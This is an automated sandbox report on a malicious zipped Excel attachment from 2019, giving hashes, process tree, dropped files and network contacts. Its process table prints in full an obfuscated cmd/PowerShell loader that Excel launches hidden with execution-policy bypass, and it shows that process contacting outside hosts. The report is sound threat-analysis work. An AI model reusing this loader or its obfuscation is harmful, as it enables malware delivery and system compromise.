File name: | 100998860826-107-0_attach.1.20190212.DOC60807.xls.zip |
Full analysis: | https://app.any.run/tasks/a70ba5ba-c6e7-4ad5-838d-d860a10b3464 |
Verdict: | Malicious activity |
Analysis date: | February 18, 2019, 15:18:31 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | D991787AEC896290C4A989871F90A963 |
SHA1: | A555FA6F7FF70570BE4E0316CBAE3D121A84E2B0 |
SHA256: | EDD90A7A56A2ECA02C43B2589FA13B4B83104C9C38D603FEBA2D1D21B1CA2E98 |
SSDEEP: | 1536:XwEhYLZ807XIRQkLeH0FtZqBDyou3qCjVvYs3k3gH8MKFS9ZGSA:XwEhi807YRQHAt8BxkDZwSkZU98SA |
.zip | ZIP compressed archive (100) |
---|---|
ZipRequiredVersion: | 20 |
ZipBitFlag: | 0x0009 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:02:18 16:16:06 |
ZipCRC: | 0x30f7d527 |
ZipCompressedSize: | 57329 |
ZipUncompressedSize: | 88582 |
ZipFileName: | 100998860826-107-0_attach.1.20190212.DOC60807.xls.tmp |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2976 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\100998860826-107-0_attach.1.20190212.DOC60807.xls.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Exit code: 0 Version: 5.60.0 | ||||
3512 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2852 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
2848 | "C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL intl.cpl | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3276 | C:\Windows\system32\mctadmin.exe | C:\Windows\system32\mctadmin.exe | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MCTAdmin Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2312 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.6024.1000 | ||||
3276 | cmD /C "sEt eIw=${d`EMo}='4 , 521,321,94 ,521,43 ,54,201, 93, 93 ,511,93 ,93 ,93,16,521 ,99,411 ,321 ,63(]][RAhC[, '''' ("nIo`j"::]GnIRTs[()''''nIOJ-''x''+]3,1[)("gni`R`tSoT".}ECNerE`F`ErPEsoB`rEV{$ ( . 83,04, 43 ,321, 84 , 521,43,54 ,201, 23 , 93, 93 ,101,401 ,93,93, 44 ,801,93,93,14 , 23 , 04,43 ,321 , 94 , 521,321 , 84 , 521 , 43 , 23,54 , 201, 93 ,93 , 99 ,611 ,93,93 , 44 , 93, 93,79,8 , 121 , 211 ,101, 93 , 93 ,44, 93 ,93 ,601 ,101,93,93 ,44 , 93,93 ,411 , 93, 93,14, 23,04 , 43 , 321, 05 , 521 ,321,94,521 ,321 ,84 , 521, 43 , 23 ,54,201 , 93, 93 ,54,489,93,93 ,14, 95 , 64, 04 , 43 ,321, 94 , 521 , 321 ,05, 521, 321,87, 101,911 ,54, 97,86 ,93,93 ,44 ,93 , 93 , 56, 001,93,93,44 , 93,93 ,84, 521, 321,94,521 , 43,23 , 54 ,201, 93 ,93 ,64, 87, 79 ,901 , 101 , 23, 04, 43, 321,05 , 521, 321, 801 ,121,89 , 86,93,93,44,93, 93 , 411 ,79 , 911 ,501 ,011, 301 ,93 , 93 , 44 , 93, 93,001 ,93 , 93 , 14 ,23,54,56 ,511 ,511, 101, 901,84 , 521 ,321 ,45, 521,43 ,54, 201 ,23 , 93 , 93 , 8 ,521 , 16 , 04,04 , 43, 321 , 05, 521 , 321,25 ,521,321 ,94, 521, 321, 15,521, 321,35,521,321 ,8,69 , 38 ,121 ,511 ,611,101,901,93 , 93 , 14 ,95 ,63,321 , 485,93 ,93 ,44 ,93, 93 ,711,411 ,64 , 99, 111, 901 , 74,93,93 ,44 , 93 , 93,401,611,611 , 211 , 511, 93,93 , 44,93, 93, 74,74 ,501,64,501 ,901,301, 93 ,93, 44,93 ,93, 38 , 93 ,93 , 44, 93, 93 ,8 ,511, 984, 98 , 76,84,521,321,45, 521, 321,65 ,521 ,43 , 23 ,54, 201,23 , 93, 93 ,311,67 ,93, 93 ,44,93,93 , 64, 211 ,011, 301,93, 93,14, 44 , 93 , 93, 74,74,74,289 , 74 ,25, 94 , 93 ,93 , 44,04,43 , 321 ,15 ,521, 321 , 35 ,521, 321 ,55, 521, 321,05 , 521 , 321 , 94 , 521, 321,25 ,521,321 ,85, 74 ,74, 501 , 901, 79, 301, 101,511 , 93, 93, 44,93 ,93 ,111, 021 ,64 ,99 , 111,901 , 93,93 , 44, 93, 93 ,74 ,74 , 74, 79 , 8 ,35 ,59,111 ,64, 211,011 ,93,93, 44 ,93 , 93 ,05,64 , 93,93 , 44 ,93 , 93 ,74,74 , 74 , 93 , 93,44 , 93 ,93 , 401, 611 ,611, 211, 511 , 89, 93, 93 , 44 ,93 , 93,65,05,021 ,15, 386 ,93 ,93 ,44 , 93 , 93 ,501,901,301, 84 , 521,43 ,54 
,201 ,23 ,93 ,93, 96 ,56 , 8 , 27, 97, 001, 43 , 23, 16 ,23 ,04, 43 , 321,94,521 ,321, 87 ,521 , 64,43 , 901 ,96 , 69 , 4801 ,521, 14,95, 63 , 321, 77, 8 , 8, 101, 43 ,04,63 , 321, 711 ,69, 28,69, 96 , 79 ,485, 43, 76, 285 ,8 , 101, 311,711 , 101 , 511, 611,39 , 89 ,28 ,101 , 87,101 ,611 , 64 , 78, 121,511, 611,101 , 901 ,64 , 8 ,521 , 14, 321 ,63,321,77, 011, 521,23 , 16,23 , 19 ,3801 ,521,23 ,501 ,011,23 ,63 , 321 ,611 ,38, 84,521,321 , 94 ,521, 43 ,23,54 , 201 , 93 ,93, 411 ,101 , 93 , 93, 44 ,93 , 93 ,301 , 93 , 93,14, 14, 95,201, 111 , 411,101 , 79 ,99,401, 04 ,63 ,321,711 ,69 ,28, 521, 16, 64,04,43 ,321, 86 , 69, 58,401 , 43 , 95, 23 , 501,201 ,23, 04,63 , 321 , 97,69 , 501 ,521 , 23 ,54 , 301 , 101 ,23, 25,25 , 25,25 ,14 ,321, 63 ,321,87,69, 17 , 69 , 4801 ,101,69,8,87,487 , 611 ,96, 87, 511 ,96, 43 ,04 , 14 ,95 , 63,321 ,111 , 69, 37 , 521,16, 63 , 321 ,111, 111,521 , 64, 43 ,76,111, 69,8, 211, 111, 69, 8 ,101 , 38,69,287 , 521,64 ,43 , 17, 69, 96, 486, 411 , 79 ,911,501 , 93 , 93,44 ,93, 93, 27 ,93 , 93,14, 95, 63 , 321, 97,97 ,521,23,16, 23 , 63 , 321 , 901 ,84,521, 321, 05, 521 , 321,25 ,521 ,43 ,23 , 54 ,201 , 93 ,93 ,64,8,121 , 511, 93,93 , 44 ,93, 93, 011,93, 93 , 44 ,93,93,611,101 ,901 ,93 , 93 ,44 ,93, 93 , 401,93, 93, 14 ,23, 04,43 ,321,15,521,321,94, 521 ,321,84 ,521 , 43 , 23 , 54, 201, 93 ,93 , 101 , 401, 93 ,93,44,93 ,93 ,383,04,43, 321,94 ,521 ,321, 87 ,101,611,93,93 ,44 ,93 , 93 , 301,64 , 66 , 501, 611,901 , 79, 211,93 ,93, 14 ,04 ,04, 84 ,521, 321 ,94 ,521, 321 ,05 ,521, 43,23, 54 , 201,93, 93,8, 101, 93,93,44,93,93 ,411 , 93,93 ,14 ,23, 04,43 , 321 ,84 , 521, 43,23 , 54, 201,23, 93,93, 401 , 93, 93, 44, 93,93 , 64, 783 , 04 ,43 ,321, 94 ,521 , 321, 801 ,521, 14 ,14 , 95 ,63 ,321 , 101 ,521,16 ,8, 86 ,43 ,04,63, 321,711, 69, 28,69, 96 , 011 , 411 ,69, 101, 56,801 , 501 , 101, 011,611, 93,93, 14,14 , 64 , 43 , 97, 089,76,84 , 521, 321, 94 ,521, 321, 05 ,521,43, 54,201, 23, 93 , 93, 66,121, 611 , 101,93, 93 , 44 ,93 , 93, 8 , 69, 501 ,521,44, 
93 ,93,19 ,93, 93 , 44 , 93,93 ,411,101 ,93 , 93 , 14, 23 , 04,43 , 321 ,801 ,43 ,04 ,63, 321 , 18 , 69 , 501 ,021, 69 , 101,8 ,521,64,43,301,96 , 611 , 086 , 69,58,521 ,16,63 , 321 ,8,69 ,484, 64 ,64 ,05 ,94 , 75, 14, 14,321, 63 ,321,984, 64 , 64 , 05, 25,14 , 421, 64, 04,93 ,93 , 73 ,93 ,93 , 14, 321 ,201,111, 411, 101 , 79 , 99,401 ,04,63 , 321 ,311,69,37 , 521 , 23,501,011, 04, 84,95,04 ,84 , 84 ,521 ,321 ,94 ,521 ,43, 54, 201 , 93 ,93 , 37,93,93,44,93 , 93 ,39 ,93,93,14 , 23 ,35, 35,83, 04 ,43,321 ,89 , 79 ,011, 001, 23, 94,35, 14 , 14 , 521 , 521 , 95 ,8,521,64 ,43, 301 ,43 ,23,54,89,111 , 411 , 04,63,321 , 121,489,79 , 011, 001,94 ,35 ,14 , 24, 94 , 45, 14 ,54, 8 , 521, 64,43 ,66,43 , 54 , 8,43 , 04, 04,63 ,321,121,69,485 , 43 , 07,67 ,69 , 97,111,285, 84 ,34, 63,321 ,311 ,501 ,521, 39 ,16,04 , 19, 901, 79 ,611 ,401,39,89 , 411 ,101 ,79 ,701 , 521 ,521, 44 ,63 ,321 , 59 , 521, 14 ,95, 63 ,321,96 ,521, 19 , 63 ,321 ,59 ,521, 24 , 05,05 , 84 , 64 ,64 , 35 ,15 , 94 , 45, 39 ,14,14,95,87 ,301,43 ,04 , 63,321,96,521,19 , 8, 37 , 69 , 8, 28,511,48 , 76,69 , 501, 501, 43 ,64 , 43 , 301 , 69, 101 ,485, 43 , 79, 385 ,8 ,101 , 021 , 611 , 64 ,96 , 011 , 99, 111,001 , 501 ,011 ,301 , 39,8 , 121,511 , 611, 101 , 901 ,64 ,48 ,93,93,14, 04, 19 ,38801 ,211, 511, 54,23, 93,93 ,93, 96 , 8,97 ,76,43 , 64 , 521 ,99 ,411,321, 63, 04, 54,64, 64 , 94, 54, 19 ,521, 76, 411 , 321, 63 ,23 , 16, 23, 521 ,201,07 , 69, 96,321 ,63 ,95, 43,44 , 43 ,23 , 611, 501 , 87 , 69,58,801 ,43, 64 , 521,07,07,69, 101, 321, 63 , 04, 54,64,64,94, 54,19,521,07 , 07 ,69 ,101 , 321,63,16, 521,111, 67 ,321 , 63 , 95,43 ,44 , 43, 23 ,011 ,501 , 111 , 601 , 54 ,23 , 39 , 14,43 ,487 ,101 ,83 , 95 , 43 , 43 ,23, 011 ,501 , 111 , 601, 54,23 ,39 , 14,43, 27, 611 , 301 , 69 ,84,321,43 , 04, 801 , 321 ,63 , 04, 14 ,93 , 021 , 93 ,44,93 , 101, 501 ,93 ,23 ,201 ,54,23 ,43,521,94 ,321 ,521, 8 ) ) )14 ,521 , 97 ,' -split "8";${de} = ${d`EmO}[-1..-(${d`emO}."CoU`NT")] -join "8";${dD}=${De}[-1..-(${D`e}."L`En`GtH")] 
-join "";^&("{1}{0}"-f 'x','ie')(${d`D})&&SeT tRsY=pOwERSHELl -ExecUTIONPOLiC BYpaSs -nOni -NOPRoFiLe -WiN hIdden . ( \"{1}{0}\"-f 't','se') dCz2Y ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' ) ) ; ( $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p' ) ) )^^^| ^^^&( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') ( \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn'' )&& cmD/C %trSY%" | C:\Windows\system32\cmD.exe | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2612 | cmD /C %trSY% | C:\Windows\system32\cmd.exe | — | cmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2624 | pOwERSHELl -ExecUTIONPOLiC BYpaSs -nOni -NOPRoFiLe -WiN hIdden . ( \"{1}{0}\"-f 't','se') dCz2Y ([tyPE](\"{2}{1}{0}\"-F 'Nt','ViROnmE','eN' ) ) ; ( $DCZ2Y::( \"{0}{2}{1}{3}{4}{5}\" -f 'gETen','oNm','vIr','E','NTVari','aBLE' ).Invoke('eIW',( \"{1}{0}\"-f'rOCess','p' ) ) )| &( ( .( \"{2}{1}{0}{3}\" -f'vari','Et-','G','ABLe') ( \"{1}{0}\" -f'r*','*Md') ).\"n`AmE\"[3,11,2]-JoIn'' ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3632 | "C:\Windows\explorer.exe" | C:\Windows\explorer.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3512 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6AA0.tmp.cvr | — | — | — |
3512 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DFEBD37C007A0762B1.TMP | — | — | — |
3512 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF725415BC979B92AA.TMP | — | — | — |
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRA66C.tmp.cvr | — | — | — |
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF7BB3F022EB7BB100.TMP | — | — | — |
2852 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF5BD562378ACDEDAD.TMP | — | — | — |
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6D17.tmp.cvr | — | — | — |
2624 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JLYO6YZWX0U1R8OF9A2J.temp | — | — | — |
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF58CF900576391DBE.TMP | — | — | — |
2312 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\~DF703E8726109A5084.TMP | — | — | — |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2624 | powershell.exe | 151.101.120.193:443 | i.imgur.com | Fastly | US | malicious |
2624 | powershell.exe | 194.76.225.64:443 | delegirato.pro | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
i.imgur.com | | shared |
delegirato.pro | | malicious |